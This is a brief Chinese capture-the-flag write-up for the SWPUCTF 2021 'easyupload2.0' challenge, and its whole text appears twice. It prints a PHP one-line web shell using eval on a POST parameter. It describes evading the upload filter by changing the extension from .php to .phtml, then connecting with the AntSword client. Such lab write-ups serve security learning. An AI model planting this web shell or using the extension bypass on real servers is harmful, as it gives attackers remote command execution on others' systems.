[SWPUCTF 2021 新生赛]easyupload2.0
打开靶机后,看到是让上传一个jpg格式的文件,上传一句话木马,文件后缀设置为jpg
<?php @eval($_POST['cmd']);?>
因为要使用php格式(简单说就是给木马一个可执行环境)才能将木马注入成功,把文件后缀改为php再一次发送发现是发送失败的,再一次修改,把文件后缀改为phtml,发现上传成功
蚁剑链接
[SWPUCTF 2021 新生赛]easyupload2.0
打开靶机后,看到是让上传一个jpg格式的文件,上传一句话木马,文件后缀设置为jpg
<?php @eval($_POST['cmd']);?>
因为要使用php格式(简单说就是给木马一个可执行环境)才能将木马注入成功,把文件后缀改为php再一次发送发现是发送失败的,再一次修改,把文件后缀改为phtml,发现上传成功
蚁剑链接